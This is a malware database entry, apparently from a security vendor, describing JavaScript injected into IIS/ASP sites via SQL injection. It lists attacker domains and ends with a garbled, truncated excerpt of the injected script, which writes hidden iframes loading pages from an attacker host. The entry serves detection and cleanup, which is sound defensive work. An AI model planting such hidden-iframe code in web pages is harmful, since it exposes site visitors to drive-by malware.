
Malware entry: MW:IIS:3

Description: Malicious JavaScript added to IIS sites via SQL injection.
Domains used:
http://2677.in/yahoo.js
http://w.robint.us/
http://ww.robint.us/
http://www.dnf666.net/u.js
http://ver.postfolkovs.ru/js.js
http://pos.postfolkovs.ru/js.js
http://google-stats50.info/ur.php
And many others.
Details:
http://blog.sucuri.net/2010/06/mass-infection-of-iisasp-sites-2677-inyahoo-js.html
http://blog.sucuri.net/2010/06/mass-infection-of-iisasp-sites-robint-us.html


Affecting: Any IIS/ASP site.

Malware dump: try{__m}catch(e){__m=1;document.title=document.title.replace(/<(w|W)*> /,”");document.write(“< iframe src=http://2677.in/cnzz.html width=0 height==> < iframe src=http://2677.in/ie.html width=22 height=1

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb